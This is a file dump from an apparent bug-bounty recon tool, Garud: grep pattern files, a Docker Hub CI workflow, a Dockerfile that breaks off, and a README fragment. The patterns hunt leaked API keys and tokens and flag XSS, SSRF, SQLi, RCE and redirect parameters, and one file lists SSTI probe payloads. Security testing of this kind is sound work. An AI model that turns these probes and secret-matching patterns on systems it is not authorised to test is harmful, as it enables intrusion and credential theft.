"-HniE", 3 | "patterns": [ 4 | "django", 5 | "laravel", 6 | "symfony", 7 | "graphite", 8 | "grafana", 9 | "X-Drupal-Cache", 10 | "struts", 11 | "code ?igniter", 12 | "cake ?php", 13 | "grails", 14 | "elastic ?search", 15 | "kibana", 16 | "log ?stash", 17 | "tomcat", 18 | "jenkins", 19 | "hudson", 20 | "com.atlassian.jira", 21 | "Apache Subversion", 22 | "Chef Server", 23 | "RabbitMQ Management", 24 | "Mongo", 25 | "Travis CI - Enterprise", 26 | "BMC Remedy", 27 | "artifactory" 28 | ] 29 | } 30 | -------------------------------------------------------------------------------- /.github/payloads/patterns/github_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "github.*['|\"][0-9a-zA-Z]{35,40}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/go-functions.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": "func [a-z0-9_]+\\(" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/google-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "AIza[0-9A-Za-z\\-\\_]{35}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-service-account_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "\"type\": \"service_account\"" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/google-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "ya29\\.[0-9A-Za-z\\-\\_]+" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/heroku-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "heroku.*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/http-auth.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hiaoE", 3 | "pattern": "[a-z0-9_/\\.:-]+@[a-z0-9-]+\\.[a-z0-9.-]+" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/idor.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "id=", 6 | "user=", 7 | "account=", 8 | "number=", 9 | "order=", 10 | "no=", 11 | "doc=", 12 | "key=", 13 | "email=", 14 | "group=", 15 | "profile=", 16 | "edit=", 17 | "report=" 18 | 19 | ] 20 | } 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /.github/payloads/patterns/img-traversal.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "=.*.jpg", 6 | "=.*.jpeg", 7 | "=.*.gif", 8 | "=.*.png" 9 | ] 10 | } 11 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingEXT.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "\\.action", 6 | "\\.adr", 7 | "\\.ascx", 8 | "\\.asmx", 9 | "\\.axd", 10 | "\\.backup", 11 | "\\.bak", 12 | "\\.bkf", 13 | "\\.bkp", 14 | "\\.bok", 15 | "\\.achee", 16 | "\\.cfg", 17 | "\\.cfm", 18 | "\\.cgi", 19 | "\\.cnf", 20 | "\\.conf", 21 | "\\.config", 22 | "\\.crt", 23 | "\\.csr", 24 | "\\.csv", 25 | "\\.dat", 26 | "\\.doc", 27 | "\\.docx", 28 | "\\.eml", 29 | "\\.env", 30 | "\\.exe", 31 | "\\.gz", 32 | "\\.ica", 33 | "\\.inf", 34 | "\\.ini", 35 | "\\.java", 36 | "\\.json", 37 | "\\.key", 38 | "\\.log", 39 | "\\.lst", 40 | "\\.mai", 41 | "\\.mbox", 42 | "\\.mbx", 43 | "\\.md", 44 | "\\.mdb", 45 | "\\.nsf", 46 | "\\.old", 47 | "\\.ora", 48 | "\\.pac", 49 | "\\.passwd", 50 | "\\.pcf", 51 | "\\.pdf", 52 | "\\.pem", 53 | "\\.pgp", 54 | "\\.pl", 55 | " plist", 56 | "\\.pwd", 57 | "\\.rdp", 58 | "\\.reg", 59 | "\\.rtf", 60 | "\\.skr", 61 | "\\.sql", 62 | "\\.swf", 63 | "\\.tpl", 64 | "\\.txt", 65 | "\\.url", 66 | "\\.wml", 67 | "\\.xls", 68 | "\\.xlsx", 69 | "\\.xml", 70 | "\\.xsd", 71 | "\\.yml" 72 | ] 73 | } 74 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingparams.json: -------------------------------------------------------------------------------- 1 | 2 | { 3 | "flags": "-iE", 4 | "patterns": [ 5 | 6 | "template=", 7 | "preview=", 8 | "id=", 9 | "view=", 10 | "activity=", 11 | "name=", 12 | "content=", 13 | "redirect=", 14 | "(&|[?])access(&|=)", 15 | "(&|[?])admin(&|=)", 16 | "(&|[?])dbg(&|=)", 17 | "(&|[?])debug(&|=)", 18 | "(&|[?])edit(&|=)", 19 | "(&|[?])grant(&|=)", 20 | "(&|[?])test(&|=)", 21 | "(&|[?])alter(&|=)", 22 | "(&|[?])clone(&|=)", 23 | "(&|[?])create(&|=)", 24 | "(&|[?])delete(&|=)", 25 | "(&|[?])disable(&|=)", 26 | "(&|[?])enable(&|=)", 27 | "(&|[?])exec(&|=)", 28 | "(&|[?])execute(&|=)", 29 | "(&|[?])load(&|=)", 30 | "(&|[?])make(&|=)", 31 | "(&|[?])modify(&|=)", 32 | "(&|[?])rename(&|=)", 33 | "(&|[?])reset(&|=)", 34 | "(&|[?])shell(&|=)", 35 | "(&|[?])toggle(&|=)", 36 | "(&|[?])adm(&|=)", 37 | "(&|[?])root(&|=)", 38 | "(&|[?])cfg(&|=)", 39 | "(&|[?])dest(&|=)", 40 | "(&|[?])redirect(&|=)", 41 | "(&|[?])uri(&|=)", 42 | "(&|[?])path(&|=)", 43 | "(&|[?])continue(&|=)", 44 | "(&|[?])url(&|=)", 45 | "(&|[?])window(&|=)", 46 | "(&|[?])next(&|=)", 47 | "(&|[?])data(&|=)", 48 | "(&|[?])reference(&|=)", 49 | "(&|[?])site(&|=)", 50 | "(&|[?])html(&|=)", 51 | "(&|[?])val(&|=)", 52 | "(&|[?])validate(&|=)", 53 | "(&|[?])domain(&|=)", 54 | "(&|[?])callback(&|=)", 55 | "(&|[?])return(&|=)", 56 | "(&|[?])feed(&|=)", 57 | "(&|[?])host(&|=)", 58 | "(&|[?])port(&|=)", 59 | "(&|[?])to(&|=)", 60 | "(&|[?])out(&|=)", 61 | "(&|[?])view(&|=)", 62 | "(&|[?])dir(&|=)", 63 | "(&|[?])show(&|=)", 64 | "(&|[?])navigation(&|=)", 65 | "(&|[?])open(&|=)", 66 | "(&|[?])file(&|=)", 67 | "(&|[?])document(&|=)", 68 | "(&|[?])folder(&|=)", 69 | "(&|[?])pg(&|=)", 70 | "(&|[?])php_path(&|=)", 71 | "(&|[?])style(&|=)", 72 | "(&|[?])doc(&|=)", 73 | "(&|[?])img(&|=)", 74 | "(&|[?])filename(&|=)", 75 | "id=", 76 | "select=", 77 | "report=", 78 | "role=", 79 | "update=", 80 | "query=", 81 | "user=", 82 | "name=", 83 | "sort=", 84 | "where=", 85 | "search=", 86 | "params=", 87 | "process=", 88 | "row=", 89 | "view=", 90 | "table=", 91 | "from=", 92 | "sel=", 93 | "results=", 94 | "sleep=", 95 | "fetch=", 96 | "order=", 97 | "keyword=", 98 | "column=", 99 | "field=", 100 | "delete=", 101 | "string=", 102 | "number=", 103 | "filter=", 104 | "(&|[?])callback=", 105 | "(&|[?])cgi-bin/redirect.cgi", 106 | "(&|[?])checkout=", 107 | "(&|[?])checkout_url=", 108 | "(&|[?])continue=", 109 | "(&|[?])data=", 110 | "(&|[?])dest=", 111 | "(&|[?])destination=", 112 | "(&|[?])dir=", 113 | "(&|[?])domain=", 114 | "(&|[?])feed=", 115 | "(&|[?])file=", 116 | "(&|[?])file_name=", 117 | "(&|[?])file_url=", 118 | "(&|[?])folder=", 119 | "(&|[?])folder_url=", 120 | "(&|[?])forward=", 121 | "(&|[?])from_url=", 122 | "(&|[?])go=", 123 | "(&|[?])goto=", 124 | "(&|[?])host=", 125 | "(&|[?])html=", 126 | "(&|[?])image_url=", 127 | "(&|[?])img_url=", 128 | "(&|[?])load_file=", 129 | "(&|[?])load_url=", 130 | "(&|[?])login_url=", 131 | "(&|[?])logout=", 132 | "(&|[?])navigation=", 133 | "(&|[?])next=", 134 | "(&|[?])next_page=", 135 | "(&|[?])Open=", 136 | "(&|[?])out=", 137 | "(&|[?])page_url=", 138 | "(&|[?])path=", 139 | "(&|[?])port=", 140 | "(&|[?])redir=", 141 | "(&|[?])redirect=", 142 | "(&|[?])redirect_to=", 143 | "(&|[?])redirect_uri=", 144 | "(&|[?])redirect_url=", 145 | "(&|[?])reference=", 146 | "(&|[?])return=", 147 | "(&|[?])return_path=", 148 | "(&|[?])return_to=", 149 | "(&|[?])returnTo=", 150 | "(&|[?])return_url=", 151 | "(&|[?])rt=", 152 | "(&|[?])rurl=", 153 | "(&|[?])show=", 154 | "(&|[?])site=", 155 | "(&|[?])target=", 156 | "(&|[?])to=", 157 | "(&|[?])uri=", 158 | "(&|[?])url=", 159 | "(&|[?])val=", 160 | "(&|[?])validate=", 161 | "(&|[?])view=", 162 | "(&|[?])window=", 163 | "daemon=", 164 | "upload=", 165 | "dir=", 166 | "execute=", 167 | "download=", 168 | "log=", 169 | "ip=", 170 | "cli=", 171 | "cmd=", 172 | "file=", 173 | "document=", 174 | "folder=", 175 | "root=", 176 | "path=", 177 | "pg=", 178 | "style=", 179 | "pdf=", 180 | "template=", 181 | "php_path=", 182 | "doc=", 183 | "page=", 184 | "name=", 185 | "id=", 186 | "user=", 187 | "account=", 188 | "number=", 189 | "order=", 190 | "no=", 191 | "doc=", 192 | "key=", 193 | "email=", 194 | "group=", 195 | "profile=", 196 | "edit=", 197 | "report=", 198 | "access=", 199 | "admin=", 200 | "dbg=", 201 | "debug=", 202 | "edit=", 203 | "grant=", 204 | "test=", 205 | "alter=", 206 | "clone=", 207 | "create=", 208 | "delete=", 209 | "disable=", 210 | "enable=", 211 | "exec=", 212 | "execute=", 213 | "load=", 214 | "make=", 215 | "modify=", 216 | "rename=", 217 | "reset=", 218 | "shell=", 219 | "toggle=", 220 | "adm=", 221 | "root=", 222 | "cfg=", 223 | "config=" 224 | ] 225 | } 226 | 227 | 228 | -------------------------------------------------------------------------------- /.github/payloads/patterns/interestingsubs.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "admin", 5 | "jenkins", 6 | "test", 7 | "proxy", 8 | "stage", 9 | "test", 10 | "dev", 11 | "devops", 12 | "staff", 13 | "db", 14 | "qa", 15 | "internal" 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ip.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnoE", 3 | "pattern": "(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/json-sec.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-harioE", 3 | "pattern": "(\\\\?\"|"|%22)[a-z0-9_-]*(api[_-]?key|S3|aws_|secret|passw|auth)[a-z0-9_-]*(\\\\?\"|"|%22): ?(\\\\?\"|"|%22)[^\"&]+(\\\\?\"|"|%22)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/jsvar.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanroE", 3 | "pattern": "var [a-z0-9_]+\\=." 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/jwt.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(jwt|jks|jwk|jku)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/lfi.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "file=", 6 | "document=", 7 | "folder=", 8 | "root=", 9 | "path=", 10 | "pg=", 11 | "style=", 12 | "pdf=", 13 | "template=", 14 | "php_path=", 15 | "doc=", 16 | "page=", 17 | "name=", 18 | "cat=", 19 | "dir=", 20 | "action=", 21 | "board=", 22 | "date=", 23 | "detail=", 24 | "download=", 25 | "prefix=", 26 | "include=", 27 | "inc=", 28 | "locate=", 29 | "show=", 30 | "site=", 31 | "type=", 32 | "view=", 33 | "content=", 34 | "layout=", 35 | "mod=", 36 | "conf=", 37 | "url=" 38 | 39 | 40 | ] 41 | } 42 | -------------------------------------------------------------------------------- /.github/payloads/patterns/mailchimp-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "[0-9a-f]{32}-us[0-9]{1,2}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/mailgun-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "key-[0-9a-zA-Z]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/meg-headers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hoiE", 3 | "pattern": "^\u003c [a-z0-9_\\-]+: .*" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/parsers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(parse|open|request|validate|verify)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/paypal-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/php-curl.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "pattern": "CURLOPT_(HTTPHEADER|HEADER|COOKIE|RANGE|REFERER|USERAGENT|PROXYHEADER)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-errors.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "php warning", 5 | "php error", 6 | "fatal error", 7 | "uncaught exception", 8 | "include_path", 9 | "undefined index", 10 | "undefined variable", 11 | "\\?php", 12 | "<\\?[^x]", 13 | "stack trace\\:", 14 | "expects parameter [0-9]*", 15 | "Debug Trace" 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-serialized.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "patterns": [ 4 | "a:[0-9]+:{", 5 | "O:[0-9]+:\"", 6 | "s:[0-9]+:\"" 7 | ] 8 | } 9 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-sinks.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": "[^a-z0-9_](system|exec|popen|pcntl_exec|eval|create_function|unserialize|file_exists|md5_file|filemtime|filesize|assert) ?\\(" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/php-sources.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "HnE", 3 | "patterns": [ 4 | "\\$_(POST|GET|COOKIE|REQUEST|SERVER|FILES)", 5 | "php://(input|stdin)" 6 | ] 7 | } 8 | -------------------------------------------------------------------------------- /.github/payloads/patterns/picatic-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "sk_live_[0-9a-z]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/rce.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "daemon=", 6 | "upload=", 7 | "dir=", 8 | "download=", 9 | "log=", 10 | "ip=", 11 | "cli=", 12 | "cmd=", 13 | "exec=", 14 | "command=", 15 | "execute=", 16 | "ping=", 17 | "query=", 18 | "jump=", 19 | "code=", 20 | "reg=", 21 | "do=", 22 | "func=", 23 | "arg=", 24 | "option=", 25 | "load=", 26 | "process=", 27 | "step=", 28 | "read=", 29 | "function", 30 | "req=", 31 | "feature=", 32 | "exe=", 33 | "module=", 34 | "payload=", 35 | "run=", 36 | "print=" 37 | ] 38 | } 39 | -------------------------------------------------------------------------------- /.github/payloads/patterns/redirect.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "Lmage_url=", 5 | "Open=", 6 | "callback=", 7 | "cgi-bin/redirect.cgi", 8 | "cgi-bin/redirect.cgi?", 9 | "checkout=", 10 | "checkout_url=", 11 | "continue=", 12 | "data=", 13 | "dest=", 14 | "destination=", 15 | "dir=", 16 | "domain=", 17 | "feed=", 18 | "file=", 19 | "file_name=", 20 | "file_url=", 21 | "folder=", 22 | "folder_url=", 23 | "forward=", 24 | "from_url=", 25 | "go=", 26 | "goto=", 27 | "host=", 28 | "html=", 29 | "image_url=", 30 | "img_url=", 31 | "load_file=", 32 | "load_url=", 33 | "login?to=", 34 | "login_url=", 35 | "logout=", 36 | "navigation=", 37 | "next=", 38 | "next_page=", 39 | "out=", 40 | "page=", 41 | "page_url=", 42 | "path=", 43 | "port=", 44 | "redir=", 45 | "redirect=", 46 | "redirect_to=", 47 | "redirect_uri=", 48 | "redirect_url=", 49 | "reference=", 50 | "return=", 51 | "returnTo=", 52 | "return_path=", 53 | "return_to=", 54 | "return_url=", 55 | "rt=", 56 | "rurl=", 57 | "show=", 58 | "site=", 59 | "target=", 60 | "to=", 61 | "uri=", 62 | "url=", 63 | "val=", 64 | "validate=", 65 | "view=", 66 | "window=" 67 | ] 68 | } 69 | -------------------------------------------------------------------------------- /.github/payloads/patterns/s3-buckets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hiaoE", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.s3\\.amazonaws\\.com", 5 | "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com", 6 | "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)", 7 | "//s3\\.amazonaws\\.com/[a-z0-9._-]+", 8 | "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" 9 | ] 10 | } 11 | -------------------------------------------------------------------------------- /.github/payloads/patterns/sec.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HaniE", 3 | "pattern": "(aws_access|aws_secret|api[_-]?key|ListBucketResult|S3_ACCESS_KEY|Authorization:|RSA PRIVATE|Index of|aws_|secret|ssh-rsa AA)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(password|private|token|secret|key|authorization|bearer)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/serial.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(pickle|yaml|serialize|marshal|objectinput)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/servers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hri", 3 | "pattern": "server: " 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/slack-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/slack-webhook_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/sqli.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "=", 5 | "id=", 6 | "select=", 7 | "report=", 8 | "role=", 9 | "update=", 10 | "query=", 11 | "user=", 12 | "name=", 13 | "sort=", 14 | "where=", 15 | "search=", 16 | "params=", 17 | "process=", 18 | "row=", 19 | "view=", 20 | "table=", 21 | "from=", 22 | "sel=", 23 | "results=", 24 | "sleep=", 25 | "fetch=", 26 | "order=", 27 | "keyword=", 28 | "column=", 29 | "field=", 30 | "delete=", 31 | "string=", 32 | "number=", 33 | "filter=" 34 | ] 35 | } 36 | -------------------------------------------------------------------------------- /.github/payloads/patterns/square-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "sq0atp-[0-9A-Za-z\\-\\_]{22}", 5 | "rsq0csp-[0-9A-Za-z\\-\\_]{43}" 6 | ] 7 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/ssrf.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "access=", 6 | "admin=", 7 | "dbg=", 8 | "debug=", 9 | "edit=", 10 | "grant=", 11 | "test=", 12 | "alter=", 13 | "clone=", 14 | "create=", 15 | "delete=", 16 | "disable=", 17 | "enable=", 18 | "exec=", 19 | "execute=", 20 | "load=", 21 | "make=", 22 | "modify=", 23 | "rename=", 24 | "reset=", 25 | "shell=", 26 | "toggle=", 27 | "adm=", 28 | "root=", 29 | "cfg=", 30 | "dest=", 31 | "redirect=", 32 | "uri=", 33 | "path=", 34 | "continue=", 35 | "url=", 36 | "window=", 37 | "next=", 38 | "data=", 39 | "reference=", 40 | "site=", 41 | "html=", 42 | "val=", 43 | "validate=", 44 | "domain=", 45 | "callback=", 46 | "return=", 47 | "page=", 48 | "feed=", 49 | "host=", 50 | "port=", 51 | "to=", 52 | "out=", 53 | "view=", 54 | "dir=", 55 | "show=", 56 | "navigation=", 57 | "open=", 58 | "file=", 59 | "document=", 60 | "folder=", 61 | "pg=", 62 | "php_path=", 63 | "style=", 64 | "doc=", 65 | "img=", 66 | "filename=" 67 | 68 | ] 69 | } 70 | 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ssti.json: -------------------------------------------------------------------------------- 1 | 2 | { 3 | "flags": "-iE", 4 | "patterns": [ 5 | 6 | "template=", 7 | "preview=", 8 | "id=", 9 | "view=", 10 | "activity=", 11 | "name=", 12 | "content=", 13 | "redirect=" 14 | ] 15 | } 16 | -------------------------------------------------------------------------------- /.github/payloads/patterns/strings.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-hoiaE", 3 | "patterns": [ 4 | "\"[^\"]+\"", 5 | "'[^']+'" 6 | ] 7 | } 8 | -------------------------------------------------------------------------------- /.github/payloads/patterns/stripe-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "sk_live_[0-9a-zA-Z]{24}", 5 | "rk_live_[0-9a-zA-Z]{24}" 6 | ] 7 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/swearwords.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(fuck|shit|stupid|dumb)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/takeovers.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "There is no app configured at that hostname", 5 | "NoSuchBucket", 6 | "No Such Account", 7 | "You're Almost There", 8 | "a GitHub Pages site here", 9 | "There's nothing here", 10 | "project not found", 11 | "Your CNAME settings", 12 | "InvalidBucketName", 13 | "PermanentRedirect", 14 | "The specified bucket does not exist", 15 | "Repository not found", 16 | "Sorry, We Couldn't Find That Page", 17 | "The feed has not been found.", 18 | "The thing you were looking for is no longer here, or never was", 19 | "Please renew your subscription", 20 | "There isn't a Github Pages site here.", 21 | "We could not find what you're looking for.", 22 | "No settings were found for this company:", 23 | "No such app", 24 | "is not a registered InCloud YouTrack", 25 | "Unrecognized domain", 26 | "project not found", 27 | "This UserVoice subdomain is currently available!", 28 | "Do you want to register", 29 | "Help Center Closed" 30 | ] 31 | } 32 | 33 | -------------------------------------------------------------------------------- /.github/payloads/patterns/twilio-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "SK[0-9a-fA-F]{32}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/twitter-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "twitter.*['|\"][0-9a-zA-Z]{35,44}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/twitter-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "twitter.*[1-9][0-9]+-[0-9a-zA-Z]{40}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/upload-fields.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "pattern": "\u003cinput[^\u003e]+type=[\"']?file[\"']?" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/urls.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-oiahE", 3 | "pattern": "https?://[^\"\\'> ]+" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/xml.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(xml|xerces|sax|etree|xpath|documentbuilder)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/xss.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | "=", 5 | "q=", 6 | "s=", 7 | "search=", 8 | "lang=", 9 | "keyword=", 10 | "query=", 11 | "page=", 12 | "keywords=", 13 | "year=", 14 | "view=", 15 | "email=", 16 | "type=", 17 | "name=", 18 | "p=", 19 | "callback=", 20 | "jsonp=", 21 | "api_key=", 22 | "api=", 23 | "password=", 24 | "email=", 25 | "emailto=", 26 | "token=", 27 | "username=", 28 | "csrf_token=", 29 | "unsubscribe_token=", 30 | "id=", 31 | "item=", 32 | "page_id=", 33 | "month=", 34 | "immagine=", 35 | "list_type=", 36 | "url=", 37 | "terms=", 38 | "categoryid=", 39 | "key=", 40 | "l=", 41 | "begindate=", 42 | "enddate=" 43 | 44 | ] 45 | } 46 | -------------------------------------------------------------------------------- /.github/payloads/ssti.txt: -------------------------------------------------------------------------------- 1 | check-ssti{{7*7}}[[1*1]] 2 | check-ssti{{7*7}} 3 | check-ssti{{7*'7'}} 4 | check-ssti<%= 7 * 7 %> 5 | check-ssti${7*7} 6 | check-ssti${{7*7}} 7 | check-ssti@(7*7) 8 | check-ssti#{7*7} 9 | check-ssti#{ 7 * 7 } 10 | -------------------------------------------------------------------------------- /.github/workflows/push-to-docker.yml: -------------------------------------------------------------------------------- 1 | name: CI to Docker Hub 2 | 3 | on: 4 | push: 5 | branches: 6 | - 'master' 7 | tags: 8 | - 'v*' 9 | 10 | jobs: 11 | push_to_registry: 12 | name: Push Docker image to Docker Hub 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout the repo 16 | uses: actions/checkout@v2 17 | 18 | - name: Extract metadata (tags, labels) for Docker 19 | id: meta 20 | uses: docker/metadata-action@v3 21 | with: 22 | images: r0x4r/garud 23 | tags: | 24 | type=raw,value=latest 25 | type=semver,pattern={{version}} 26 | type=semver,pattern={{major}}.{{minor}} 27 | 28 | - name: Login to Docker Hub 29 | uses: docker/login-action@v1 30 | with: 31 | username: ${{ secrets.DOCKER_HUB_USERNAME }} 32 | password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} 33 | 34 | - name: Set up Docker Buildx 35 | id: buildx 36 | uses: docker/setup-buildx-action@v1 37 | 38 | - name: Build and push Docker image 39 | uses: docker/build-push-action@v2 40 | with: 41 | context: . 42 | push: true 43 | tags: ${{ steps.meta.outputs.tags }} 44 | labels: ${{ steps.meta.outputs.labels }} 45 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1.3-labs 2 | 3 | #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# 4 | 5 | FROM golang:1.16-alpine AS go-builder 6 | ENV GO111MODULE=on 7 | RUN < 2 |
3 | Garud 4 | 5 | 6 |

An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.

7 | 8 |

9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |

17 | 18 | --- 19 | 20 | I made this tool to automate my recon and save my time. It really give me headache always type such command and then wait to complete one command and I type other command. So I collected some of the tools which is widely used in the bugbounty field. In this script I used Assetfinder, subfinder, amass, httpx, sublister, gauplus and gf patterns and then it uses dirsearch, dalfox, nuclei and kxss to find some low-hanging fruits.
